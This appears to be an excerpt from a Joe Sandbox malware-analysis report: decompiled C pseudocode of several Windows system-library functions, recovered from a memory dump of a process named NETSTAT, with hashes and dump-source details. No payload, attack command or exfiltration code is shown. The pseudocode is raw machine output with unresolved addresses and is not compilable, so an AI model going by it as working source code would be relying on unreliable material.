                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 52552e42132d0ac9d7a73d03a2132ac4ad39f61e7c4c7226ca12e0617beec7b9
                • Instruction ID: 45491e3ce641e20bc2ff531311985b2ba445a9ab186f20570cfaddd793309184
                • Opcode Fuzzy Hash: 52552e42132d0ac9d7a73d03a2132ac4ad39f61e7c4c7226ca12e0617beec7b9
                • Instruction Fuzzy Hash: BF816E79A242819FDB25CE14C8C0E6AB7E9FB84394F18486EED459B340D731ED41CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E033D6DC9(signed int __ecx, void* __edx) {
                				unsigned int _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v32;
                				char _v36;
                				char _v40;
                				char _v44;
                				char _v48;
                				char _v52;
                				char _v56;
                				char _v60;
                				void* _t87;
                				void* _t95;
                				signed char* _t96;
                				signed int _t107;
                				signed int _t136;
                				signed char* _t137;
                				void* _t157;
                				void* _t161;
                				void* _t167;
                				intOrPtr _t168;
                				void* _t174;
                				void* _t175;
                				signed int _t176;
                				void* _t177;
                
                				_t136 = __ecx;
                				_v44 = 0;
                				_t167 = __edx;
                				_v40 = 0;
                				_v36 = 0;
                				_v32 = 0;
                				_v60 = 0;
                				_v56 = 0;
                				_v52 = 0;
                				_v48 = 0;
                				_v16 = __ecx;
                				_t87 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                				_t175 = _t87;
                				if(_t175 != 0) {
                					_t11 = _t175 + 0x30; // 0x30
                					 *((short*)(_t175 + 6)) = 0x14d4;
                					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                					E033D6B4C(_t167, _t11, 0x214,  &_v8);
                					_v12 = _v8 + 0x10;
                					_t95 = E03377D50();
                					_t137 = 0x7ffe0384;
                					if(_t95 == 0) {
                						_t96 = 0x7ffe0384;
                					} else {
                						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                					}
                					_push(_t175);
                					_push(_v12);
                					_push(0x402);
                					_push( *_t96 & 0x000000ff);
                					E03399AE0();
                					_t87 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                					_t176 = _v16;
                					if((_t176 & 0x00000100) != 0) {
                						_push( &_v36);
                						_t157 = 4;
                						_t87 = E033D795D( *((intOrPtr*)(_t167 + 8)), _t157);
                						if(_t87 >= 0) {
                							_v24 = E033D795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                							_v28 = E033D795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                							_push( &_v52);
                							_t161 = 5;
                							_t168 = E033D795D( *((intOrPtr*)(_t167 + 8)), _t161);
                							_v20 = _t168;
                							_t107 = L03374620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                							_v16 = _t107;
                							if(_t107 != 0) {
                								_v8 = _v8 & 0x00000000;
                								 *(_t107 + 0x20) = _t176;
                								 *((short*)(_t107 + 6)) = 0x14d5;
                								_t47 = _t107 + 0x24; // 0x24
                								_t177 = _t47;
                								E033D6B4C( &_v36, _t177, 0xc78,  &_v8);
                								_t51 = _v8 + 4; // 0x4
                								_t178 = _t177 + (_v8 >> 1) * 2;
                								_v12 = _t51;
                								E033D6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                								_v12 = _v12 + _v8;
                								E033D6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                								_t125 = _v8;
                								_v12 = _v12 + _v8;
                								E033D6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                								_t174 = _v12 + _v8;
                								if(E03377D50() != 0) {
                									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                								}
                								_push(_v16);
                								_push(_t174);
                								_push(0x402);
                								_push( *_t137 & 0x000000ff);
                								E03399AE0();
                								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                								_t168 = _v20;
                							}
                							_t87 = L03372400( &_v36);
                							if(_v24 >= 0) {
                								_t87 = L03372400( &_v44);
                							}
                							if(_t168 >= 0) {
                								_t87 = L03372400( &_v52);
                							}
                							if(_v28 >= 0) {
                								return L03372400( &_v60);
                							}
                						}
                					}
                				}
                				return _t87;
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                • Instruction ID: d60114821141914a2d12df7eaa00f9e9e9341be3174a9b5d377a1f0375e60099
                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                • Instruction Fuzzy Hash: 8A718C76E00209EFCB10DFA5D984AEEBBB8FF48300F144469E505EB290DB34EA41CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E033EB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                				char _v8;
                				signed int _v12;
                				signed int _t80;
                				signed int _t83;
                				intOrPtr _t89;
                				signed int _t92;
                				signed char _t106;
                				signed int* _t107;
                				intOrPtr _t108;
                				intOrPtr _t109;
                				signed int _t114;
                				void* _t115;
                				void* _t117;
                				void* _t119;
                				void* _t122;
                				signed int _t123;
                				signed int* _t124;
                
                				_t106 = _a12;
                				if((_t106 & 0xfffffffc) != 0) {
                					return 0xc000000d;
                				}
                				if((_t106 & 0x00000002) != 0) {
                					_t106 = _t106 | 0x00000001;
                				}
                				_t109 =  *0x3447b9c; // 0x0
                				_t124 = L03374620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                				if(_t124 != 0) {
                					 *_t124 =  *_t124 & 0x00000000;
                					_t124[1] = _t124[1] & 0x00000000;
                					_t124[4] = _t124[4] & 0x00000000;
                					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                						L13:
                						_push(_t124);
                						if((_t106 & 0x00000002) != 0) {
                							_push(0x200);
                							_push(0x28);
                							_push(0xffffffff);
                							_t122 = E03399800();
                							if(_t122 < 0) {
                								L33:
                								if((_t124[4] & 0x00000001) != 0) {
                									_push(4);
                									_t64 =  &(_t124[1]); // 0x4
                									_t107 = _t64;
                									_push(_t107);
                									_push(5);
                									_push(0xfffffffe);
                									E033995B0();
                									if( *_t107 != 0) {
                										_push( *_t107);
                										E033995D0();
                									}
                								}
                								_push(_t124);
                								_push(0);
                								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                								L37:
                								L033777F0();
                								return _t122;
                							}
                							_t124[4] = _t124[4] | 0x00000002;
                							L18:
                							_t108 = _a8;
                							_t29 =  &(_t124[0x105]); // 0x414
                							_t80 = _t29;
                							_t30 =  &(_t124[5]); // 0x14
                							_t124[3] = _t80;
                							_t123 = 0;
                							_t124[2] = _t30;
                							 *_t80 = _t108;
                							if(_t108 == 0) {
                								L21:
                								_t112 = 0x400;
                								_push( &_v8);
                								_v8 = 0x400;
                								_push(_t124[2]);
                								_push(0x400);
                								_push(_t124[3]);
                								_push(0);
                								_push( *_t124);
                								_t122 = E03399910();
                								if(_t122 != 0xc0000023) {
                									L26:
                									if(_t122 != 0x106) {
                										L40:
                										if(_t122 < 0) {
                											L29:
                											_t83 = _t124[2];
                											if(_t83 != 0) {
                												_t59 =  &(_t124[5]); // 0x14
                												if(_t83 != _t59) {
                													L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                												}
                											}
                											_push( *_t124);
                											E033995D0();
                											goto L33;
                										}
                										 *_a16 = _t124;
                										return 0;
                									}
                									if(_t108 != 1) {
                										_t122 = 0;
                										goto L40;
                									}
                									_t122 = 0xc0000061;
                									goto L29;
                								} else {
                									goto L22;
                								}
                								while(1) {
                									L22:
                									_t89 =  *0x3447b9c; // 0x0
                									_t92 = L03374620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                									_t124[2] = _t92;
                									if(_t92 == 0) {
                										break;
                									}
                									_t112 =  &_v8;
                									_push( &_v8);
                									_push(_t92);
                									_push(_v8);
                									_push(_t124[3]);
                									_push(0);
                									_push( *_t124);
                									_t122 = E03399910();
                									if(_t122 != 0xc0000023) {
                										goto L26;
                									}
                									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                								}
                								_t122 = 0xc0000017;
                								goto L26;
                							}
                							_t119 = 0;
                							do {
                								_t114 = _t124[3];
                								_t119 = _t119 + 0xc;
                								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                								_t123 = _t123 + 1;
                								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                							} while (_t123 < _t108);
                							goto L21;
                						}
                						_push(0x28);
                						_push(3);
                						_t122 = E0335A7B0();
                						if(_t122 < 0) {
                							goto L33;
                						}
                						_t124[4] = _t124[4] | 0x00000001;
                						goto L18;
                					}
                					if((_t106 & 0x00000001) == 0) {
                						_t115 = 0x28;
                						_t122 = E033EE7D3(_t115, _t124);
                						if(_t122 < 0) {
                							L9:
                							_push(_t124);
                							_push(0);
                							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                							goto L37;
                						}
                						L12:
                						if( *_t124 != 0) {
                							goto L18;
                						}
                						goto L13;
                					}
                					_t15 =  &(_t124[1]); // 0x4
                					_t117 = 4;
                					_t122 = E033EE7D3(_t117, _t15);
                					if(_t122 >= 0) {
                						_t124[4] = _t124[4] | 0x00000001;
                						_v12 = _v12 & 0x00000000;
                						_push(4);
                						_push( &_v12);
                						_push(5);
                						_push(0xfffffffe);
                						E033995B0();
                						goto L12;
                					}
                					goto L9;
                				} else {
                					return 0xc0000017;
                				}
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c28c8a5e1f8a6d4b6ed799e4981292f6d71077fd703a18ce8f73106f9304ebe
                • Instruction ID: 532a15018bc4f64e78a4ab57d3ab108793bfbba0436fe0a721d93af4fa8ec1be
                • Opcode Fuzzy Hash: 1c28c8a5e1f8a6d4b6ed799e4981292f6d71077fd703a18ce8f73106f9304ebe
                • Instruction Fuzzy Hash: 5371EB36604712EFEB32DF14CC80F66FBA9EB40720F184528E6559B6E0DB74E941CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E033552A5(char __ecx) {
                				char _v20;
                				char _v28;
                				char _v29;
                				void* _v32;
                				void* _v36;
                				void* _v37;
                				void* _v38;
                				void* _v40;
                				void* _v46;
                				void* _v64;
                				void* __ebx;
                				intOrPtr* _t49;
                				signed int _t53;
                				short _t85;
                				signed int _t87;
                				signed int _t88;
                				signed int _t89;
                				intOrPtr _t101;
                				intOrPtr* _t102;
                				intOrPtr* _t104;
                				signed int _t106;
                				void* _t108;
                
                				_t93 = __ecx;
                				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                				_push(_t88);
                				_v29 = __ecx;
                				_t89 = _t88 | 0xffffffff;
                				while(1) {
                					E0336EEF0(0x34479a0);
                					_t104 =  *0x3448210; // 0xb32bd8
                					if(_t104 == 0) {
                						break;
                					}
                					asm("lock inc dword [esi]");
                					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                					E0336EB70(_t93, 0x34479a0);
                					if( *((char*)(_t108 + 0xf)) != 0) {
                						_t101 =  *0x7ffe02dc;
                						__eflags =  *(_t104 + 0x14) & 0x00000001;
                						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                							L9:
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0x90028);
                							_push(_t108 + 0x20);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push( *((intOrPtr*)(_t104 + 4)));
                							_t53 = E03399890();
                							__eflags = _t53;
                							if(_t53 >= 0) {
                								__eflags =  *(_t104 + 0x14) & 0x00000001;
                								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                									E0336EEF0(0x34479a0);
                									 *((intOrPtr*)(_t104 + 8)) = _t101;
                									E0336EB70(0, 0x34479a0);
                								}
                								goto L3;
                							}
                							__eflags = _t53 - 0xc0000012;
                							if(__eflags == 0) {
                								L12:
                								_t13 = _t104 + 0xc; // 0xb32be5
                								_t93 = _t13;
                								 *((char*)(_t108 + 0x12)) = 0;
                								__eflags = E0338F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                								if(__eflags >= 0) {
                									L15:
                									_t102 = _v28;
                									 *_t102 = 2;
                									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                									E0336EEF0(0x34479a0);
                									__eflags =  *0x3448210 - _t104; // 0xb32bd8
                									if(__eflags == 0) {
                										__eflags =  *((char*)(_t108 + 0xe));
                										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                										 *0x3448210 = _t102;
                										_t32 = _t102 + 0xc; // 0x0
                										 *_t95 =  *_t32;
                										_t33 = _t102 + 0x10; // 0x0
                										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                										_t35 = _t102 + 4; // 0xffffffff
                										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                										if(__eflags != 0) {
                											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                											E033D4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                										}
                										E0336EB70(_t95, 0x34479a0);
                										asm("lock xadd [esi], eax");
                										if(__eflags == 0) {
                											_push( *((intOrPtr*)(_t104 + 4)));
                											E033995D0();
                											L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                										}
                										asm("lock xadd [esi], ebx");
                										__eflags = _t89 == 1;
                										if(_t89 == 1) {
                											_push( *((intOrPtr*)(_t104 + 4)));
                											E033995D0();
                											L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                										}
                										_t49 = _t102;
                										L4:
                										return _t49;
                									}
                									E0336EB70(_t93, 0x34479a0);
                									asm("lock xadd [esi], eax");
                									if(__eflags == 0) {
                										_push( *((intOrPtr*)(_t104 + 4)));
                										E033995D0();
                										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                									}
                									 *_t102 = 1;
                									asm("lock xadd [edi], eax");
                									if(__eflags == 0) {
                										_t28 = _t102 + 4; // 0xffffffff
                										_push( *_t28);
                										E033995D0();
                										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                									}
                									continue;
                								}
                								_t93 =  &_v20;
                								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                								_t85 = 6;
                								_v20 = _t85;
                								_t87 = E0338F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                								__eflags = _t87;
                								if(_t87 < 0) {
                									goto L3;
                								}
                								 *((char*)(_t108 + 0xe)) = 1;
                								goto L15;
                							}
                							__eflags = _t53 - 0xc000026e;
                							if(__eflags != 0) {
                								goto L3;
                							}
                							goto L12;
                						}
                						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                							goto L3;
                						} else {
                							goto L9;
                						}
                					}
                					L3:
                					_t49 = _t104;
                					goto L4;
                				}
                				_t49 = 0;
                				goto L4;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 52dd8cb1d96dcdd6eab67c2dffae9efcd7f2b9cd58205d153613845e0b1586aa
                • Instruction ID: 55358ed8332566a8b7d3e1dff175b0bf348498fa2dd9e5bff6049e57a8952765
                • Opcode Fuzzy Hash: 52dd8cb1d96dcdd6eab67c2dffae9efcd7f2b9cd58205d153613845e0b1586aa
                • Instruction Fuzzy Hash: 0B51EE35605341AFE720EF64C980B6BBBE8FF44710F14492EF8A58BA50E770E805CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E03382AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                				signed short* _v8;
                				signed short* _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr* _v28;
                				signed int _v32;
                				signed int _v36;
                				short _t56;
                				signed int _t57;
                				intOrPtr _t58;
                				signed short* _t61;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				intOrPtr _t84;
                				intOrPtr _t87;
                				intOrPtr* _t90;
                				signed short* _t91;
                				signed int _t95;
                				signed short* _t96;
                				intOrPtr _t97;
                				intOrPtr _t102;
                				signed int _t108;
                				intOrPtr _t110;
                				signed int _t111;
                				signed short* _t112;
                				void* _t113;
                				signed int _t116;
                				signed short** _t119;
                				short* _t120;
                				signed int _t123;
                				signed int _t124;
                				void* _t125;
                				intOrPtr _t127;
                				signed int _t128;
                
                				_t90 = __ecx;
                				_v16 = __edx;
                				_t108 = _a4;
                				_v28 = __ecx;
                				_t4 = _t108 - 1; // -1
                				if(_t4 > 0x13) {
                					L15:
                					_t56 = 0xc0000100;
                					L16:
                					return _t56;
                				}
                				_t57 = _t108 * 0x1c;
                				_v32 = _t57;
                				_t6 = _t57 + 0x3448204; // 0x0
                				_t123 =  *_t6;
                				_t7 = _t57 + 0x3448208; // 0x3448207
                				_t8 = _t57 + 0x3448208; // 0x3448207
                				_t119 = _t8;
                				_v36 = _t123;
                				_t110 = _t7 + _t123 * 8;
                				_v24 = _t110;
                				_t111 = _a4;
                				if(_t119 >= _t110) {
                					L12:
                					if(_t123 != 3) {
                						_t58 =  *0x3448450; // 0xb310fc
                						if(_t58 == 0) {
                							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                						}
                					} else {
                						_t26 = _t57 + 0x344821c; // 0x0
                						_t58 =  *_t26;
                					}
                					 *_t90 = _t58;
                					goto L15;
                				} else {
                					goto L2;
                				}
                				while(1) {
                					_t116 =  *_t61 & 0x0000ffff;
                					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                					if(_t116 == _t128) {
                						goto L18;
                					}
                					L5:
                					if(_t116 >= 0x61) {
                						if(_t116 > 0x7a) {
                							_t97 =  *0x3446d5c; // 0x7fc10654
                							_t72 =  *0x3446d5c; // 0x7fc10654
                							_t75 =  *0x3446d5c; // 0x7fc10654
                							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                						} else {
                							_t116 = _t116 - 0x20;
                						}
                					}
                					if(_t128 >= 0x61) {
                						if(_t128 > 0x7a) {
                							_t102 =  *0x3446d5c; // 0x7fc10654
                							_t84 =  *0x3446d5c; // 0x7fc10654
                							_t87 =  *0x3446d5c; // 0x7fc10654
                							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                						} else {
                							_t128 = _t128 - 0x20;
                						}
                					}
                					if(_t116 == _t128) {
                						_t61 = _v12;
                						_t96 = _v8;
                					} else {
                						_t113 = _t116 - _t128;
                						L9:
                						_t111 = _a4;
                						if(_t113 == 0) {
                							_t115 =  &(( *_t119)[_t111 + 1]);
                							_t33 =  &(_t119[1]); // 0x100
                							_t120 = _a8;
                							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                							_t35 = _t95 - 1; // 0xff
                							_t124 = _t35;
                							if(_t120 == 0) {
                								L27:
                								 *_a16 = _t95;
                								_t56 = 0xc0000023;
                								goto L16;
                							}
                							if(_t124 >= _a12) {
                								if(_a12 >= 1) {
                									 *_t120 = 0;
                								}
                								goto L27;
                							}
                							 *_a16 = _t124;
                							_t125 = _t124 + _t124;
                							E0339F3E0(_t120, _t115, _t125);
                							_t56 = 0;
                							 *((short*)(_t125 + _t120)) = 0;
                							goto L16;
                						}
                						_t119 =  &(_t119[2]);
                						if(_t119 < _v24) {
                							L2:
                							_t91 =  *_t119;
                							_t61 = _t91;
                							_v12 = _t61;
                							_t112 =  &(_t61[_t111]);
                							_v8 = _t112;
                							if(_t61 >= _t112) {
                								break;
                							} else {
                								_t127 = _v16 - _t91;
                								_t96 = _t112;
                								_v20 = _t127;
                								_t116 =  *_t61 & 0x0000ffff;
                								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                								if(_t116 == _t128) {
                									goto L18;
                								}
                								goto L5;
                							}
                						} else {
                							_t90 = _v28;
                							_t57 = _v32;
                							_t123 = _v36;
                							goto L12;
                						}
                					}
                					L18:
                					_t61 =  &(_t61[1]);
                					_v12 = _t61;
                					if(_t61 >= _t96) {
                						break;
                					}
                					_t127 = _v20;
                				}
                				_t113 = 0;
                				goto L9;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a7b3c802fd695b56806d352ac7a5af52e9ca967ca809d5fff82ef37fd1d679e4
                • Instruction ID: 98143c3e0ca86cc4f0060a99ed40fe6ef9d7d142939701258a3bace99cea54b6
                • Opcode Fuzzy Hash: a7b3c802fd695b56806d352ac7a5af52e9ca967ca809d5fff82ef37fd1d679e4
                • Instruction Fuzzy Hash: 8D51D4BAE002158FCB15EF1DC8C09BEB7F5FB88700716896AE846EB314D734AA51C790
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E0337DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                				char _v5;
                				signed int _v12;
                				signed int* _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				void* __ebx;
                				void* __edi;
                				signed int _t54;
                				char* _t58;
                				signed int _t66;
                				intOrPtr _t67;
                				intOrPtr _t68;
                				intOrPtr _t72;
                				intOrPtr _t73;
                				signed int* _t75;
                				intOrPtr _t79;
                				intOrPtr _t80;
                				char _t82;
                				signed int _t83;
                				signed int _t84;
                				signed int _t88;
                				signed int _t89;
                				intOrPtr _t90;
                				intOrPtr _t92;
                				signed int _t97;
                				intOrPtr _t98;
                				intOrPtr* _t99;
                				signed int* _t101;
                				signed int* _t102;
                				intOrPtr* _t103;
                				intOrPtr _t105;
                				signed int _t106;
                				void* _t118;
                
                				_t92 = __edx;
                				_t75 = _a4;
                				_t98 = __ecx;
                				_v44 = __edx;
                				_t106 = _t75[1];
                				_v40 = __ecx;
                				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                					_t82 = 0;
                				} else {
                					_t82 = 1;
                				}
                				_v5 = _t82;
                				_t6 = _t98 + 0xc8; // 0xc9
                				_t101 = _t6;
                				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                				if(_t82 != 0) {
                					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                					_t83 =  *_t75;
                					_t54 = _t75[1];
                					 *_t101 = _t83;
                					_t84 = _t83 | _t54;
                					_t101[1] = _t54;
                					if(_t84 == 0) {
                						_t101[1] = _t101[1] & _t84;
                						 *_t101 = 1;
                					}
                					goto L19;
                				} else {
                					if(_t101 == 0) {
                						E0335CC50(E03354510(0xc000000d));
                						_t88 =  *_t101;
                						_t97 = _t101[1];
                						L15:
                						_v12 = _t88;
                						_t66 = _t88 -  *_t75;
                						_t89 = _t97;
                						asm("sbb ecx, [ebx+0x4]");
                						_t118 = _t89 - _t97;
                						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                							_t66 = _t66 | 0xffffffff;
                							_t89 = 0x7fffffff;
                						}
                						 *_t101 = _t66;
                						_t101[1] = _t89;
                						L19:
                						if(E03377D50() != 0) {
                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                						} else {
                							_t58 = 0x7ffe0386;
                						}
                						_t102 = _v16;
                						if( *_t58 != 0) {
                							_t58 = E03428ED6(_t102, _t98);
                						}
                						_t76 = _v44;
                						E03372280(_t58, _v44);
                						E0337DD82(_v44, _t102, _t98);
                						E0337B944(_t102, _v5);
                						return E0336FFB0(_t76, _t98, _t76);
                					}
                					_t99 = 0x7ffe03b0;
                					do {
                						_t103 = 0x7ffe0010;
                						do {
                							_t67 =  *0x3448628; // 0x0
                							_v28 = _t67;
                							_t68 =  *0x344862c; // 0x0
                							_v32 = _t68;
                							_v24 =  *((intOrPtr*)(_t99 + 4));
                							_v20 =  *_t99;
                							while(1) {
                								_t97 =  *0x7ffe000c;
                								_t90 =  *0x7FFE0008;
                								if(_t97 ==  *_t103) {
                									goto L10;
                								}
                								asm("pause");
                							}
                							L10:
                							_t79 = _v24;
                							_t99 = 0x7ffe03b0;
                							_v12 =  *0x7ffe03b0;
                							_t72 =  *0x7FFE03B4;
                							_t103 = 0x7ffe0010;
                							_v36 = _t72;
                						} while (_v20 != _v12 || _t79 != _t72);
                						_t73 =  *0x3448628; // 0x0
                						_t105 = _v28;
                						_t80 =  *0x344862c; // 0x0
                					} while (_t105 != _t73 || _v32 != _t80);
                					_t98 = _v40;
                					asm("sbb edx, [ebp-0x20]");
                					_t88 = _t90 - _v12 - _t105;
                					_t75 = _a4;
                					asm("sbb edx, eax");
                					_t31 = _t98 + 0xc8; // 0x341fb53
                					_t101 = _t31;
                					 *_t101 = _t88;
                					_t101[1] = _t97;
                					goto L15;
                				}
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d2aab0c487d650b51220ed0d22d2f3b69bdf85d403f8d3c4ce42ba328474d44f
                • Instruction ID: e2960742466cfaa7f9565095a0fdc7fda692c11e077712e58f40017a001a40b6
                • Opcode Fuzzy Hash: d2aab0c487d650b51220ed0d22d2f3b69bdf85d403f8d3c4ce42ba328474d44f
                • Instruction Fuzzy Hash: 53519E79E00645CFCB24DF68C8C0AAEFBF5BF48310F24819AD955AB344DB39A944CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
